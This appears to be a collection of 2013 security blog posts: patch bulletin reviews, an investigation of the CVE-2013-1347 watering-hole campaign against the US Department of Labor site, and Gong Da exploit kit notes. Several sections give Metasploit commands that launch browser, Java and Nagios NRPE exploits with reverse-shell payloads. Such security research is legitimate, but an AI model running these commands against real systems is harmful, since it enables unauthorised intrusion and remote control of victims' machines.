APSB13-14 – Adobe Flash May 2013 Security Bulletin Review

APSB13-14 is concerning :

• Adobe Flash Player 11.7.700.169 and earlier versions for Windows and Macintosh
• Adobe Flash Player 11.2.202.280 and earlier versions for Linux
• Adobe Flash Player 11.1.115.54 and earlier versions for Android 4.x
• Adobe Flash Player 11.1.111.50 and earlier versions for Android 3.x and 2.x
• Adobe AIR 3.7.0.1530 and earlier versions for Windows and Macintosh
• Adobe AIR 3.7.0.1660 and earlier versions for Android
• Adobe AIR 3.7.0.1530 SDK & Compiler and earlier versions

CVE-2013-2728 (10.0 CVSS base score), CVE-2013-3324 (10.0 CVSS base score), CVE-2013-3325 (10.0 CVSS base score), CVE-2013-3326 (10.0 CVSS base score), CVE-2013-3327 (10.0 CVSS base score), CVE-2013-3328 (10.0 CVSS base score), CVE-2013-3329 (10.0 CVSS base score), CVE-2013-3330 (10.0 CVSS base score), CVE-2013-3331 (10.0 CVSS base score) and CVE-2013-3332 (10.0 CVSS base score) were discovered and privately reported by Mateusz Jurczyk and Ben Hawkes of the Google Security Team.

CVE-2013-3333 (10.0 CVSS base score), CVE-2013-3334 (10.0 CVSS base score) and CVE-2013-3335 (10.0 CVSS base score) were discovered and privately reported by Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna of the Google Security Team.

Microsoft Security Advisory 2755801

MSA-2755801,released during September 2012, has been updated. The security advisory is regarding updates for vulnerabilities in Adobe Flash Player in Internet Explorer 10. KB2840613 has been released for supported editions of Windows 8, Windows Server 2012, and Windows RT. The update addresses the vulnerabilities described in Adobe Security bulletin APSB13-14.

Microsoft Security Advisory 2820197

MSA-2820197 update includes kill bits to prevent Honeywell Enterprise Buildings Integrator and SymmetrE and ComfortPoint Open Manager ActiveX controls from being run in Internet Explorer.

Microsoft Security Advisory 2846338

MSA-2846338 concern a privately reported security vulnerability, CVE-2013-1303 (9.3 CVSS base score), in Microsoft Malware Protection Engine that could allow remote code execution if the Microsoft Malware Protection Engine scans a specially crafted file. This vulnerability has been publicly disclosed as a denial of service. Only x64-based versions of the Malware Protection Engine are affected.

Microsoft Security Advisory 2847140

MSA-2847140, released May 3rd 2013, has been updated. The security advisory concern Microsoft Internet Explorer 8 remote code execution vulnerability (CVE-2013-1347) used in targeted attacks against United States Department of Labor (DOL) Site Exposure Matrices (SEM) and other websites. Microsoft has issue MS13-038 to address the vulnerability.

MS13-037 Cumulative Security Update for Internet Explorer

MS13-037 security update, classified as Critical, allowing remote code execution, is the fix for 11 privately reported vulnerabilities in Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, and Internet Explorer 10. CVE-2013-1297 (4.3 CVSS base score) was discovered and privately reported by Yosuke Hasegawa. CVE-2013-0811 (9.3 CVSS base score) was discovered and privately reported by Jose Antonio Vazquez Gonzalez, working with VeriSign iDefense Labs. CVE-2013-1306 (9.3 CVSS base score) and CVE-2013-1309 (9.3 CVSS base score) were discovered and privately reported by SkyLined, working with HP’s Zero Day Initiative. CVE-2013-1307 (9.3 CVSS base score) was discovered and privately reported by Ivan Fratric of the Google Security Team. CVE-2013-1308 (9.3 CVSS base score) was discovered and privately reported by Aniway.Anyway@gmail.com, working with HP’s Zero Day Initiative. CVE-2013-1310 (9.3 CVSS base score) was discovered and privately reported by Yuhong Bao. CVE-2013-1311 (9.3 CVSS base score) was discovered and privately reported by Scott Bell of Security-Assessment.com. CVE-2013-1312 (9.3 CVSS base score) was discovered and privately reported by Stephen Fewer of Harmony Security. CVE-2013-1313 (9.3 CVSS base score) was discovered and privately reported by VUPEN Security (Pwn2Own 2013), working with HP’s Zero Day Initiative.

MS13-038 Security Update for Internet Explorer

MS13-038 security update, classified as Critical, allowing remote code execution, is the fix for one publicly disclosed vulnerability in Internet Explorer 8. CVE-2013-1347 (9.3 CVSS base score), was discovered exploited in the wild in targeted attacks.

MS13-039 Vulnerability in HTTP.sys Could Allow Denial of Service

MS13-039 security update, classified as Important, allowing denial of service, is the fix for one privately reported vulnerability in Microsoft Windows. CVE-2013-1305 (5.0 CVSS base score) was discovered and privately reported by Marek Kroemeke, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, AKAT-1, working with HP’s Zero Day Initiative.

MS13-040 Vulnerabilities in .NET Framework Could Allow Spoofing

MS13-040 security update, classified as Important, allowing spoofing, is the fix for one privately reported vulnerability and one publicly disclosed vulnerability in .NET Framework. CVE-2013-1336 (5.0 CVSS base score) was discovered and privately reported by James Forshaw of Context Information Security. CVE-2013-1337 (7.5 CVSS base score) was publicly disclosed.

MS13-041 Vulnerability in Lync Could Allow Remote Code Execution

MS13-041 security update, classified as Important, allowing remote code execution, is the fix for one privately reported vulnerability in Microsoft Lync. CVE-2013-1302 (9.3 CVSS base score) was discovered and privately reported.

MS13-042 Vulnerabilities in Microsoft Publisher Could Allow Remote Code Execution

MS13-042 security update, classified as Important, allowing remote code execution, is the fix for 11 privately reported vulnerabilities in Microsoft Office. CVE-2013-1316 (9.3 CVSS base score), CVE-2013-1317 (9.3 CVSS base score), CVE-2013-1318 (10.0 CVSS base score), CVE-2013-1319 (10.0 CVSS base score), CVE-2013-1320 (10.0 CVSS base score), CVE-2013-1321 (9.3 CVSS base score), CVE-2013-1322 (10.0 CVSS base score), CVE-2013-1323 (9.3 CVSS base score), CVE-2013-1327 (9.3 CVSS base score), CVE-2013-1328 (9.3 CVSS base score) and CVE-2013-1329 (9.3 CVSS base score) were discovered and privately reported by Will Dormann of the CERT/CC.

MS13-043 Vulnerability in Microsoft Word Could Allow Remote Code Execution

MS13-043 security update, classified as Important, allowing remote code execution, is the fix for one privately reported vulnerability in Microsoft Office. CVE-2013-1335 (9.3 CVSS base score) was discovered and privately reported by Will Dormann of the CERT/CC.

MS13-044 Vulnerability in Microsoft Visio Could Allow Information Disclosure

MS13-044 security update, classified as Important, allowing information disclosure, is the fix for one privately reported vulnerability in Microsoft Office. CVE-2013-1301 (4.3 CVSS base score) was discovered and privately reported by Timur Yunusov of Positive Technologies.

MS13-045 Vulnerability in Windows Essentials Could Allow Information Disclosure

MS13-045 security update, classified as Important, allowing information disclosure, is the fix for one privately reported vulnerability in Windows Essentials. CVE-2013-0096 (6.8 CVSS base score) was discovered and privately reported by Andrea Micalizzi, working with Beyond Security’s SecuriTeam Secure Disclosure team.

MS13-046 Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege

MS13-046 security update, classified as Important, allowing elevation of privilege, is the fix for three privately reported vulnerabilities in Microsoft Windows. CVE-2013-1332 (7.2 CVSS base score) was discovered and privately reported by Gynvael Coldwind and Mateusz “j00ru” Jurczyk of Google Inc. CVE-2013-1333 (7.2 CVSS base score) was discovered and privately reported by Qihoo 360 Security Center. CVE-2013-1334 (7.2 CVSS base score) was discovered and privately reported by an anonymous researcher, working with the iDefense VCP.

The Better Health Services (BHS) is a USAID-funded health systems strengthening project in Cambodia that began in January 2009 and runs through December 2013. The BHS project’s goals dovetail with the mission of the Ministry of Health as stated in the Cambodian Health Strategic Plan 2008-2015 (HSP2) “to provide stewardship for the entire health sector and to ensure a supportive environment for increased demand and equitable access to quality health services in order that all the peoples of Cambodia are able to achieve the highest level of health and well-being.”

By continuing my researches on the gathered information’s found on dol[.]ns01[.]us backend and focusing on all information’s related to University Research Co. Cambodia website, I found some interesting behaviours.

In all the gathered information’s I firstly found a connection referer to www[.]urccambodia[.]org, this referer was a shortened URL http://t[.]co/RnWc0Z13Sc. Doing a google research on this shortened URL we can find a tweet from @natividad_usaid, dating from 2013-03-18.

If you observe @natividad_usaid, you will see that the account activity has begun the March 18th and finished the April 10th. Mostly all of the tweet have provide link to www[.]urccambodia[.]org, during the time of this website infection. Some twitter users were directly contacted in order to incite them to click to the link and most of these users were related to USAID (US Agency for International Development).

But most interesting is the profile description of this account and especially the shortened URL goo[.]gl/kpb7r how lead to “this is my pic.scr” file hosted on Dropbox. By analyzing this file it appear that it is Poison Ivy (504a32e123194a298018129404a1374e).

A malwr analysis of this sample reveal that “microsoftUpdate[.]ns1[.]name” is the contacted C&C server and that “conime.exe” file is also created. This C&C server is the same as mentioned by Crowdstrike, AlienVault and other security researchers or vendors, but from “bookmark.png” payload involved in Internet Explorer 8 0day (CVE-2013-1347).

It seem that this twitter account was only created and used to incite USAID twitter users to be infected through a www[.]urccambodia[.]org visit.

By continuing to analyze www[.]urccambodia[.]org related gathered information’s, I found a second connection referer to www[.]urccambodia[.]org. This referer is the Facebook profile of Kelly Black “http://www.facebook.com/kelly.black.92754“.

This sexy lady, posing with a friend, pretend to have work for USAID, to have study at UVA College of Arts & Sciences Alumni, to live in Washington, District of Columbia and to be from Springfield, Illinois.

Kelly Black account activity has start and stopped the same day, the March 24th. Most of the posts of this “lady” are link to infected www[.]urccambodia[.]org website and/or to project around sanitation of Mekong waters organized by US organization’s.

This sexy lady has, in one day of activity, 41 friends and most of these friends are from USAID or from others organization’s.

Now the funny part of the story, on the picture you can see two beautiful women with a yellow T-shirt and they seem to enjoy the live. One of the friends of Kelly Black was interesting to know which of the two she was, and the “bad guys” toke the time to respond to him

But I was intrigued by this picture and decided to compare this one on Internet, and ho miracle these ladies are not US women from Springfield, Illinois, but Swedish supporters who were photographed during European soccer cup in Poland/Ukraine.

You can find this photo through TinEye or Google pictures comparison services. This photo is present on different medias, ActionPlus, DailyMail and bunch of other websites.

The exploit used in this campaign was firstly reported as CVE-2012-4792, an Internet Explorer 0day used in December 2012 in CFR.org watering hole campaign and patched by Microsoft in January 2013. Despite the patch release some forks of this exploit were still used in targeted attacks against political parties, political dissidents, online medias and human right activists.

Two days later, FireEye, Invicia and AlienVault concluded that the vulnerability targeted during this attack campaign was not CVE-2012-4792 as they originally reported but a new Internet Explorer 8 vulnerability identified as CVE-2013-1347. This turnaround had unfortunately occur to late. Casual attacker, chaotic actors, organized crime and potentially other states involved in sponsored espionage had the opportunity to study the attack and recover the evidences.

Microsoft has acknowledge the vulnerability in a Microsoft Security Advisory published on May 3rd and identified as MSA-2847140 and has provide a “Fix it” solution to mitigate Internet Explorer 8 vulnerability.

Also, Adobe has announce through APSA13-03 that a critical vulnerability (CVE-2013-3336) is actually exploited against ColdFusion. This vulnerability could permit an unauthorized user to remotely retrieve files stored on the server, through “CFIDE/administrator“, “CFIDE/adminapi” and “CFIDE/gettingstarted*” directories. Adobe ColdFusion is used by DOL and this vulnerability has surely be used in order to compromise the server.

Possible Causes of Confusion between CVE-2012-4792 and CVE-2013-1347

Confusions with CVE-2012-4792 was possible due to similarities in used code and technics:

Usage of widely used JavaScript functions and variables

“function getCookieVal(offset)“, widely used, is also present in original CVE-2012-4792 exploit and other forks.
“function GetCookie(name)“, widely used,  is also present in original CVE-2012-4792 exploit and other forks.
“function SetCookie(name,value)“, widely used, is also present in original CVE-2012-4792 exploit and other forks.
“var ua = window.navigator.userAgent.toLowerCase()“, widely used, is also present in original CVE-2012-4792 exploit and other forks.

Usage of particular JavaScript functions also present in previous watering hole campaigns

“function DisplayInfo()” also seen in CVE-2012-4792 & CVE-2011-0611 exploits.
“function download()” & “function callback()” also seen in CVE-2012-4792 exploit.

Usage of Ajax XMLHttpRequest

This JavaScript object is used to download “bookmark.png” file and was also used to download  ”xsainfo.jpg” file in CVE-2012-4792.

Similarities in the JavaScript code structure

If you compare the original CVE-2012-4792 JavaScript code and Exodus Intel fork, with this new exploit, the code structure is very similar in many aspects.

Usage of HTML+TIME technic

HTML+TIME, which is based on the Synchronized Multimedia Integration Language (SMIL), was also used in certain CVE-2012-4792. This technic was explained by Exodus Intel beginning January 2013.

Target selection

Parts of the code targets only Windows XP, Internet Explorer 8 and certain languages, like CVE-2012-4792.

Differences between CVE-2012-4792 and CVE-2013-1347, and Particularities

Some new particularities were present in the exploit and associated watering hole campaign:

Usage of PHP files

All previous watering hole attacks have use HTML or JavaScript files. PHP usage naturally limit the number of potential servers who could be used to start the exploitation and spread the malware. This approach increasingly the technic used by Exploit Kits, maybe a source of inspiration and effectiveness for states involved in sponsored espionage.

Usage of Base64 obfuscation

Obfuscation with base64 encoding (“base64.js” file) was used to hide parts of the exploit. CVE-2012-4792 was using “robots.txt” obfuscated with substitutions and HEX encoding.

Use-After-Free type

As mentioned by sinn3r of Metasploit team, CVE-2012-4792 was a CButton object use-after-free and CVE-2013-1347 is a CGenericElement object use-after-free.

dol[.]ns01[.]us Exploit Hosting Domain Evolutions

Invicia and AlienVault have report that the browser was redirected to the content hosted at dol[.]ns01[.]us which lead to the infection. A urlQuery, of 2013-05-01, is mentioned and refer to dol[.]ns01[.]us on port 8081/TCP. One hit related to the information gathering script is mentioning a last modified date of Thu, 14 Mar 2013 20:06:36 GMT. You can also observe in the executed JavaScript that the hxxp://dol[.]ns01[.]us:8081/web/js.php and hxxp://dol[.]ns01[.]us:8081/web/css.js URL’s are present in the code.

But if you take a look to a previous urlQuery report of 2013-04-29, hxxp://96[.]44[.]136[.]115/web/js.php, hxxp://96[.]44[.]136[.]115/web/css.js and hxxp:///web/xss.php are mentioned and coded in the executed JavaScript. 96[.]44[.]136[.]115 IP address is mentioned by AlienVault as the IP address behind dol[.]ns01[.]us. As you can see no specific destination port is present and the last modified date is the same. So we can conclude that the guys behind this campaign have change the malicious code during this interval.

You can observe this evolution with the urlQuery submission of 2013-04-30.

All these urlQuery submission’s were done with a non Internet Explorer 8 user agent, and as the exploit malicious code was designed to only target Windows XP and Internet Explorer 8, part of the redirection were not present as evidences.

If you observe “/scripts/textsize.js” JavaScript code hosted on DOL website, you can see a first JavaScript inclusion to “hxxp://dol[.]ns01[.]us:8081/web/xss.php” and a second one to “hxxp://dol[.]ns01[.]us:8081/update/index.php“.

The first inclusion “/web/xss.php” was used in order to gather information’s on the DOL website visitors and the second inclusion “/update/index.php” was used to start the exploitation of CVE-2013-1347.

Information Gathering Scripts

As described by AlienVault, the information gathering code “/web/xss.php” on dol[.]ns01[.]us use different JavaScript functions to collect information’s from the system and upload the result to the malicious server.

I found that the information’s gathering script was different depending on the used browser. Here under a description of the JavaScript functions involved in information’s gathering depending on used browsers.

DOL Information Gathering Functions

Also a specific information gathering technic was triggered when Internet Explorer was used. This technic is related to a non patched vulnerability in Internet Explorer 8, discovered by NSFOCUS and reported to Microsoft in 2011. The vulnerability could allow user information and even local file content leakage if a user views a specially crafted webpage using Internet Explorer.

Once all information’s gathered, the script send all data’s on a specific URL “hxxp://dol[.]ns01[.]us:8081/web/js.php” and also call “hxxp://dol[.]ns01[.]us:8081/web/css.js” when the information’s are collected.

An interesting information regarding “/web/css.js“, is that the “Last Modified” date reported by “dol[.]ns01[.]us” server is Thu, 14 Mar 2013 20:06:36 GMT. This is reporting that the information gathering infrastructure was in place since mid-March minimum.

Interesting facts regarding these information gathering scripts are:

• Scripts “xss.php“, “js.php” & “css.js” have move from IP 96[.]44[.]136[.]115 on port 80/TCP to domain dol[.]ns01[.]us port 8081/TCP. Move from port 80/TCP to 8081/TCP doesn’t seem to be logic, most of time outgoing connexion’s authorized on Firewalls, for corporate Web surfing, are 80/TCP and 443/TCP.
• Different types of information gathering scripts were in place, and all users who have visit DOL website were affected by this information gathering campaign.
• Usage of a specific information leakage vulnerability present in Internet Explorer 8 and not fixed by Microsoft.
• BitDefender 2012 deactivation attempt is confusing. Why trying to deactivate an anti-virus, this will surely generate an alert.

Information Gathered on dol[.]ns01[.]us

As described in the previous chapter, the information gathering code send a lot of information’s to the backend. Hopefully for security researchers, the backend wasn’t very well protected and all collected information’s were accessible without any restrictions in different web folders. You can find here under some statistics related to the gathered information’s.

Complete geolocation of the targeted source IPs

By analyzing the information’s sent to the backend, we can also see that DOL (www.sem.dol.gov) wasn’t the only compromised website:

• From 2013-03-15 to 2013-04-29 : University Research Co. Cambodia website (www.urccambodia.org) was the first target .This explain the high number of distinct IP addresses from Cambodia.
• From 2013-04-08 to 2013-04-24 : Awards for Excellence in Education website (www.forexcellenceineducation.org), a program of Fraser Institute, was the second target.
• From 2013-04-08 to 2013-04-24 : ElectionGuide website (www.electionguide.org), provided by the International Foundation for Electoral Systems (IFES), was the third target.
• From 2013-04-09 to 2013-04-30 : French Institute of International Relations website (www.ifri.org), was the fourth target.
• From 2013-04-09 to 2013-04-24 : The Working for America Institute website (www.workingforamerica.org), was the fifth target.
• From 2013-04-09 to 2013-04-10 : The Project 2049 Institute website (www.project2049.net), was the sixth target.
• From 2013-04-10 to 2013-04-10 : The Union Label and Service Trades Department website (www.unionlabel.org), was the seventh target.
• From 2013-04-11 to 2013-04-30 : Thales Catalogue website (components-subsystems.thales-catalogue.com), was the eighth target.
• From 2013-04-23 to 2013-05-01 : United States Department of Labor (DOL) Site Exposure Matrices (SEM) website (www.sem.dol.gov), was the ninth target.

Here under the hits by browsers and Internet Explorer 8 hits by OS.

Others Information’s Gathered

As you have read in the previous chapter, ElectionGuide website (www.electionguide.org) was also targeted during this watering hole campaign. As you can see in the following urlQuery submission, dating from 2013-05-01, 96[.]44[.]136[.]115 is also present but don’t respond any more. Also if you observe the urlQuery submission of 2013-05-03, 96[.]44[.]136[.]115 is still present, but a new backend server has been setup in order replace the once deactivated.

If you observe the “Last Modified” date of “css.js” file, the installation date of these files is at least the 2013-05-03.

Also, by researching some patterns matching the information’s gathering script on Google you can find some previous unknown campaigns, that were using the same code.

Watering hole campaign first reported on a private mailing list the 2013-04-30
Watering hole campaign publicly disclosed by AlienVault and Invincea the 2013-04-30
0day exploit spotted by FireEye the 2013-05-03
Microsoft Security Advisory posted the 2013-05-03
Metasploit PoC provided the 2013-05-05

PoC provided by :

Unknown
EMH
juan vazquez
sinn3r

Reference(s) :

CVE-2013-1347
OSVDB-92993
MSA-2847140

Affected version(s) :

Internet Explorer 8

Tested on Windows XP Pro SP3 with :

Internet Explorer 8

Description :

This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that’s controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) web site.

Commands :

use exploit/windows/browser/ie_cgenericelement_uaf
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

Vulnerability discovered and reported to vendor by Jeroen Frijters
Vulnerability corrected in April CPU the 2013-04-16
Vulnerability publicly disclosed by Jeroen Frijters the 2013-04-17
Metasploit PoC provided the 2013-04-20

PoC provided by :

Jeroen Frijters
juan vazquez

Reference(s) :

Oracle Java April 2013 CPU
CVE-2013-2423
OSVDB-92348
BID-59162

Affected version(s) :

JDK and JRE 7 Update 17 and earlier

Tested on Windows XP Pro SP3 with :

JDK and JRE 7 Update 17

Description :

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit doesn’t bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.

Commands :

use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

This update fix the vulnerabilities exploited by James Forshaw (tyranid), Joshua J. Drake and VUPEN Security during Pwn20wn 2013. But this update is also fixing vulnerabilities reported by Adam Gowdiak of Security Explorations and other security researchers.

As you may know Oracle is using CVSS 2.0 (Common Vulnerability Scoring System) in order to score the reported vulnerabilities. But as you also may know security researchers disagree with the usage of CVSS by Oracle. Oracle play with CVSS score by creating a “Partial+” impact rating how don’t exist in CVSS 2.0, and by interpreting the “Complete” rating in a different way than defined in CVSS 2.0.

Affected products are:

• JDK and JRE 7 Update 17 and earlier
• JDK and JRE 6 Update 43 and earlier
• JDK and JRE 5.0 Update 41 and earlier
• JavaFX 2.2.7 and earlier

Proposed updates are:

• JDK and JRE 7 Update 21
• JDK and JRE 6 Update 45
• JDK and JRE 5.0 Update 43
• JavaFX 2.2.21

19 (45,24%) of the vulnerabilities have a CVSS base score of 10.0, 28 (66,67%) of the vulnerabilities have a high CVSS base score (CVSS => 7.0), 13 (30,95%) of the vulnerabilities have a medium CVSS base score (CVSS >= 4.0 < 7.0) and 1 (2,38%) of the vulnerabilities has a low CVSS base score (CVSS < 4.0). Also 25 (59,52%) of the vulnerabilities affects Java SE 6 and 42 (100%) of the vulnerabilities are affecting Java SE 7.

Also some modifications have been done in the Security Levels provided by Oracle. Previously five levels were existing (Very-High, High, Medium, Low and Custom), in the new provided version only three levels are still existing (Very-High, High and Medium).

But, there is always a but with Oracle, they don’t seem to have enable, by default, the check for revocation using Certificate Revocation Lists (CRLs) despite that some bad guys are using valid stollen and revoked certificates to sign malware’s.

So we advise you to update asap, enable the CRL check, if you still have Oracle Java plug-in installed !

Here is the new code for CVE-2013-1493.

And here the new code for CVE-2012-4792 (aka 4792.html) and CVE-2012-4969 (aka payload.html).

Also a new variant of CVE-2012-1889 (xml.html) has been introduced, reducing the detection rate by anti-viruses.

As always this new version of Gong Da Exploit Kit has been discovered on a Korean web site.

Gong Da Pack has involve to the following diagram.

Here under some information s regarding the different files:

• HcIa2.jar (aka CVE-2011-3544): 11/46 on VirusTotal.com
  
• bzExj6.jar (aka CVE-2012-0507): 14/45 on VirusTotal.com
• BnkLbvY3.jar (aka CVE-2012-1723): 19/46 on VirusTotal.com
• iCNpns4.jar (aka CVE-2012-4681): 28/46 on VirusTotal.com
• JdtDFRW1.jar (aka CVE-2012-5076): 16/46 on VirusTotal.com
• TolxrJG6.jar (aka CVE-2013-0422): 19/46 on VirusTotal.com
• FQxzUjYP.jar (aka CVE-2013-1493): 16/46 on VirusTotal.com
• GwDFO7.swf (aka CVE-2013-0634): 10/46 on VirusTotal.com
• xmlcoreOld.html (aka CVE-2012-1889): 18/46 on VirusTotal.com
• xml.html (aka CVE-2012-1889): 3/35 on VirusTotal.com
• xmlcoreNew.html (aka CVE-2012-1889): 10/45 on VirusTotal.com
• 4792.html (aka CVE-2012-4792): 1/46 on VirusTotal.com
• xyaKEg.html and payload.html (aka CVE-2012-4969): 5/46 on VirusTotal.com

Normally Gong Da was used against gamers, but this time the loaded malware seem to be different (analysis on ThreatExpert)

Vulnerability discovered and reported to vendor by Rudolph Pereira
Vulnerability patched by vendor the 2012-12-21
Vulnerability publicly disclosed by Rudolph Pereira the 2013-02-21
Metasploit PoC provided the 2013-03-19

PoC provided by :

Rudolph Pereira
jwpari

Reference(s) :

CVE-2013-1362
OSVDB-90582
BID-58142

Affected version(s) :

Nagios Remote Plugin Executor (NRPE) prior to 2.14

Tested on Ubuntu 12.10 x86 with :

Nagios Remote Plugin Executor (NRPE) 2.13

Description :

The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.

Commands :

use exploit/linux/misc/nagios_nrpe_arguments
set RHOST 192.168.178.54
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.36
exploit

id
uname -a
ifconfig

APSB13-11 - Security updates available for Adobe Flash Player

APSB13-11 is concerning :

• Adobe Flash Player 11.6.602.180 and earlier versions for Windows and Macintosh
• Adobe Flash Player 11.2.202.275  and earlier versions for Linux
• Adobe Flash Player 11.1.115.48 and earlier versions for Android 4.x
• Adobe Flash Player 11.1.111.44 and earlier versions for Android 3.x and 2.x
• Adobe AIR 3.6.0.6090 and earlier versions for Windows, Macintosh and Android
• Adobe AIR 3.6.0.6090 SDK & Compiler and earlier version

CVE-2013-1378 (7.5 CVSS base score), CVE-2013-1379 (7.5 CVSS base score) and CVE-2013-1380 (7.5 CVSS base score) have been discovered and privately reported by Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna of the Google Security Team. CVE-2013-2555 (10.0 CVSS base score) has been discovered and privately reported by a VUPEN Security reported through TippingPoint’s Zero Day Initiative.